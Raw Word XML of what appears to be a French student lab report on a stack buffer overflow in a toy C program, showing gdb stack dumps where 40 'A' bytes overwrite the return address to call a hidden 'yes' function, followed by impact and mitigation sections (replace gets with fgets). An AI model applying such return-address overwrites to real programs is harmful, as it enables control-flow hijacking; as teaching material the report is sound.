      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> enabled]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F1D01D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 xml:space="preserve">Using host </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libthread_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> library "/lib/x86_64-linux-gnu/libthread_db.so.1".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC9CE97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Are you a good student?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78073977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4834766D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Breakpoint 1, 0x00005555555551a9 in check () at goodstudent3.c:17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB01887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17</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    gets(buffer</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41A9C038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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x/8xg $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="284001A2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0x7fffffffe0a0:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x0000000000000000</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8B5CCC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0x7fffffffe0b0:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fffffffe1f8</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007ffff7ffe2c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F73D9C0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0x7fffffffe0c0:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fffffffe0e0</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x00005555555551f3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7553D8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0x7fffffffe0d0:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fffffffe1f8</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x0000000100000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321E6F0B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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496D036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Continuing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BE91F1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01F19ABA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Breakpoint 2, check () at goodstudent3.c:18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC992AF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18</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcasecmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buffer, "Of course!\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D177F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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x/8xg $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D4B3E67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0x7fffffffe0a0:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x4141414141414141</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x4141414141414141</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA5B209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0x7fffffffe0b0:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x4141414141414141</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x4141414141414141</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ABDB17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0x7fffffffe0c0:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x4141414141414141</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x0000555555555169</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3900B056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0x7fffffffe0d0:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fffffffe100</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x0000000100000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A79A8CF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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584E0EAD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Continuing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4595D7E4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 xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Yes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> you are!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208825E3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</w:p>
    <w:p w14:paraId="22224A10" w14:textId="77777777" w:rsidR="003A550B" w:rsidRPr="003A550B" w:rsidRDefault="003A550B" w:rsidP="003A550B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CD0208" w14:textId="187FFE10" w:rsidR="00087CAB" w:rsidRPr="003A550B" w:rsidRDefault="003A550B" w:rsidP="003A550B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x00007fffffffe100 in ?? ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5B0D7F" w14:textId="77777777" w:rsidR="00FA492D" w:rsidRDefault="00FA492D" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0306E4B3" w14:textId="749D36AB" w:rsidR="003A550B" w:rsidRDefault="003A550B" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nous utilisons python pour</w:t>
      </w:r>
      <w:r w:rsidR="000F6138">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B4746">
        <w:t>envoyer notre input au programme, contenant 40 caractères A puis l’adresse de la fonction yes,</w:t>
      </w:r>
      <w:r w:rsidR="00BD113B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00637CF9">
        <w:t>avec</w:t>
      </w:r>
      <w:r w:rsidR="00435C64">
        <w:t xml:space="preserve"> le caractère hexadécimal correspondant à </w:t>
      </w:r>
      <w:r w:rsidR="00637CF9">
        <w:t xml:space="preserve">chaque </w:t>
      </w:r>
      <w:r w:rsidR="004B05F8">
        <w:t>octet</w:t>
      </w:r>
      <w:r w:rsidR="00B80728">
        <w:t xml:space="preserve"> de l’adresse. Comme </w:t>
      </w:r>
      <w:r w:rsidR="00513340">
        <w:t xml:space="preserve">Kali Linux est un système </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00513340">
        <w:t>little</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00513340">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00513340">
        <w:t>endian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00513340">
        <w:t xml:space="preserve">, les différents octets d’une valeur </w:t>
      </w:r>
      <w:r w:rsidR="00180EBD">
        <w:t xml:space="preserve">en comprenant plusieurs sont stockés dans la mémoire </w:t>
      </w:r>
      <w:r w:rsidR="00703B66">
        <w:t>de l’octet au poid</w:t>
      </w:r>
      <w:r w:rsidR="005D533D">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00703B66">
        <w:t xml:space="preserve"> le plus faible (le "dernier") à l’octet </w:t>
      </w:r>
      <w:r w:rsidR="005D533D">
        <w:t>au poids le plus fort (le "premier").</w:t>
      </w:r>
      <w:r w:rsidR="0011352D">
        <w:t xml:space="preserve"> Nous devons donc écrire les </w:t>
      </w:r>
      <w:r w:rsidR="00F52F83">
        <w:t>différents octets de l’adresse dans l’ordre inverse pour que celle-ci soit correctement écrite dans la mémoire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF56BCA" w14:textId="77777777" w:rsidR="004F5FE7" w:rsidRDefault="004F5FE7" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DDACAE7" w14:textId="3C053843" w:rsidR="004F5FE7" w:rsidRPr="005A7844" w:rsidRDefault="004F5FE7" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous affichons le contenu de la stack </w:t>
      </w:r>
      <w:r w:rsidR="00E31755">
        <w:t xml:space="preserve">avec la fonction </w:t>
      </w:r>
      <w:r w:rsidR="00E31755">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">x </w:t>
      </w:r>
      <w:r w:rsidR="00E31755">
        <w:t xml:space="preserve"> avant et après l’appel à la fonction </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E31755" w:rsidRPr="00E31755">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E31755">
        <w:t xml:space="preserve">, et nous pouvons voir que </w:t>
      </w:r>
      <w:r w:rsidR="005A7844">
        <w:t xml:space="preserve">nous modifions bien la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005A7844">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A7844">
        <w:t xml:space="preserve"> pour y mettre l’adresse de la fonction </w:t>
      </w:r>
      <w:r w:rsidR="005A7844">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidR="005A7844">
        <w:t xml:space="preserve">. Nous continuons ensuite l’exécution du programme, et nous voyons que la fonction </w:t>
      </w:r>
      <w:r w:rsidR="005A7844">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidR="005A7844">
        <w:t xml:space="preserve"> est bien exécutée comme </w:t>
      </w:r>
      <w:r w:rsidR="004E5C3C">
        <w:t>recherché</w:t>
      </w:r>
      <w:r w:rsidR="005A7844">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5550FB8E" w14:textId="7543D641" w:rsidR="00142964" w:rsidRPr="00437531" w:rsidRDefault="00142964" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00437531">
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024F78BA" w14:textId="7D4C831B" w:rsidR="00F22F74" w:rsidRPr="00437531" w:rsidRDefault="008661D9" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Avec ce</w:t>
      </w:r>
      <w:r w:rsidR="00551B71">
        <w:t xml:space="preserve">tte vulnérabilité, un utilisateur </w:t>
      </w:r>
      <w:r w:rsidR="009F3A3C">
        <w:t xml:space="preserve">du programme </w:t>
      </w:r>
      <w:r w:rsidR="001E76EA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>goodstudent3</w:t>
      </w:r>
      <w:r w:rsidR="00551B71">
        <w:t xml:space="preserve"> pourrait </w:t>
      </w:r>
      <w:r w:rsidR="001E76EA">
        <w:t xml:space="preserve">exécuter </w:t>
      </w:r>
      <w:r w:rsidR="000E6580">
        <w:t xml:space="preserve">la fonction cachée </w:t>
      </w:r>
      <w:r w:rsidR="000E6580" w:rsidRPr="000E6580">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
      <w:r w:rsidR="000E6580">
        <w:t xml:space="preserve"> dans un cas d’exécution qui ne devrait pas le permettre</w:t>
      </w:r>
      <w:r w:rsidR="00DA5C95">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1B2B47" w14:textId="02CD77F2" w:rsidR="00142964" w:rsidRDefault="00200F18" w:rsidP="00577F07">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00437531">
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EF238B" w14:textId="7EE68020" w:rsidR="00791FEE" w:rsidRPr="002C7DF8" w:rsidRDefault="00FC04E2" w:rsidP="00577F07">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pour éviter ce problème, il est nécessaire </w:t>
      </w:r>
      <w:r w:rsidR="002C7DF8">
        <w:t xml:space="preserve">d’empêcher le buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C7DF8">
        <w:t>overflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C7DF8">
        <w:t xml:space="preserve">. Cela peut être fait en utilisant la fonction </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000E6580">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>fgets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C7DF8">
        <w:t xml:space="preserve"> plutôt que </w:t>
      </w:r>
      <w:r w:rsidR="000E6580">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>gets</w:t>
      </w:r>
      <w:r w:rsidR="002C7DF8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DF5D0B">
        <w:t xml:space="preserve">ou en </w:t>
      </w:r>
      <w:r w:rsidR="002315BF">
        <w:t xml:space="preserve">faisant une vérification de la taille de l’argument </w:t>
      </w:r>
      <w:r w:rsidR="009A2EBA">
        <w:t>avant de le recopier dans un buffer trop petit.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00791FEE" w:rsidRPr="002C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CD0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="663A3A04"/>
    <w:lvl w:ilvl="0" w:tplc="0AEA3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5546"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8272C1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D611E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2ED89466"/>
    <w:lvl w:ilvl="0" w:tplc="9B52365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B8EDD2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CE7D6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94C08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F0A4E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5E4A9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74E82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7EFC2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D8B48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6EB025F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="61E2B6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0BB7580"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FDB0F212"/>
    <w:lvl w:ilvl="0" w:tplc="9B52365C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="u"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="72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95163">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1204713599">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="269625776">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1583101395">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="146913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64"/>
    <w:rsid w:val="00000767"/>
    <w:rsid w:val="00004A41"/>
    <w:rsid w:val="00005F03"/>
    <w:rsid w:val="00010019"/>
    <w:rsid w:val="000119E0"/>
    <w:rsid w:val="00013F6C"/>
    <w:rsid w:val="00014FA5"/>
    <w:rsid w:val="0001676E"/>
    <w:rsid w:val="00016C89"/>
    <w:rsid w:val="000218B1"/>
    <w:rsid w:val="0002388F"/>
    <w:rsid w:val="00030A24"/>
    <w:rsid w:val="00030D44"/>
    <w:rsid w:val="00035929"/>
    <w:rsid w:val="00036D8B"/>
    <w:rsid w:val="00057932"/>
    <w:rsid w:val="0006046C"/>
    <w:rsid w:val="00062DD5"/>
    <w:rsid w:val="00075A3B"/>
    <w:rsid w:val="00087CAB"/>
    <w:rsid w:val="000A3B91"/>
    <w:rsid w:val="000B3985"/>
    <w:rsid w:val="000B4746"/>
    <w:rsid w:val="000C41E8"/>
    <w:rsid w:val="000D5703"/>
    <w:rsid w:val="000E6580"/>
    <w:rsid w:val="000F6138"/>
    <w:rsid w:val="00100AFC"/>
    <w:rsid w:val="00102087"/>
    <w:rsid w:val="001048E6"/>
    <w:rsid w:val="00105CEC"/>
    <w:rsid w:val="00107CC1"/>
    <w:rsid w:val="001128EA"/>
    <w:rsid w:val="0011352D"/>
    <w:rsid w:val="001146FB"/>
    <w:rsid w:val="0011756E"/>
    <w:rsid w:val="001244E2"/>
    <w:rsid w:val="00130105"/>
    <w:rsid w:val="00130FE0"/>
    <w:rsid w:val="0013261C"/>
    <w:rsid w:val="001407E7"/>
    <w:rsid w:val="00142964"/>
    <w:rsid w:val="001436BC"/>
    <w:rsid w:val="00161789"/>
    <w:rsid w:val="00180EBD"/>
    <w:rsid w:val="001863B4"/>
    <w:rsid w:val="001913F0"/>
    <w:rsid w:val="00192ABE"/>
    <w:rsid w:val="001A0112"/>
    <w:rsid w:val="001B09FA"/>
    <w:rsid w:val="001B6823"/>
    <w:rsid w:val="001C4E10"/>
    <w:rsid w:val="001C5F37"/>
    <w:rsid w:val="001E00CD"/>
    <w:rsid w:val="001E40E7"/>
    <w:rsid w:val="001E7206"/>
    <w:rsid w:val="001E76EA"/>
    <w:rsid w:val="001F3224"/>
    <w:rsid w:val="00200F18"/>
    <w:rsid w:val="00202A22"/>
    <w:rsid w:val="00204A39"/>
    <w:rsid w:val="00210BCF"/>
    <w:rsid w:val="00225657"/>
    <w:rsid w:val="002315BF"/>
    <w:rsid w:val="002325DF"/>
    <w:rsid w:val="002328B4"/>
    <w:rsid w:val="00234709"/>
    <w:rsid w:val="0024390B"/>
    <w:rsid w:val="00244A63"/>
    <w:rsid w:val="00251D0F"/>
    <w:rsid w:val="002556BF"/>
    <w:rsid w:val="00281EC2"/>
    <w:rsid w:val="00285AE7"/>
    <w:rsid w:val="0028765B"/>
    <w:rsid w:val="002974AD"/>
    <w:rsid w:val="002B0F97"/>
    <w:rsid w:val="002B681D"/>
    <w:rsid w:val="002C7DF8"/>
    <w:rsid w:val="002D66EB"/>
    <w:rsid w:val="003314A8"/>
    <w:rsid w:val="00345AC7"/>
    <w:rsid w:val="00353F67"/>
    <w:rsid w:val="00356981"/>
    <w:rsid w:val="0035707B"/>
    <w:rsid w:val="003617D7"/>
    <w:rsid w:val="003631F4"/>
    <w:rsid w:val="00370E54"/>
    <w:rsid w:val="00372115"/>
    <w:rsid w:val="003858BB"/>
    <w:rsid w:val="00387896"/>
    <w:rsid w:val="00393FAE"/>
    <w:rsid w:val="003A04A0"/>
    <w:rsid w:val="003A550B"/>
    <w:rsid w:val="003B4231"/>
    <w:rsid w:val="003C11E4"/>
    <w:rsid w:val="003C6A9C"/>
    <w:rsid w:val="003C72A7"/>
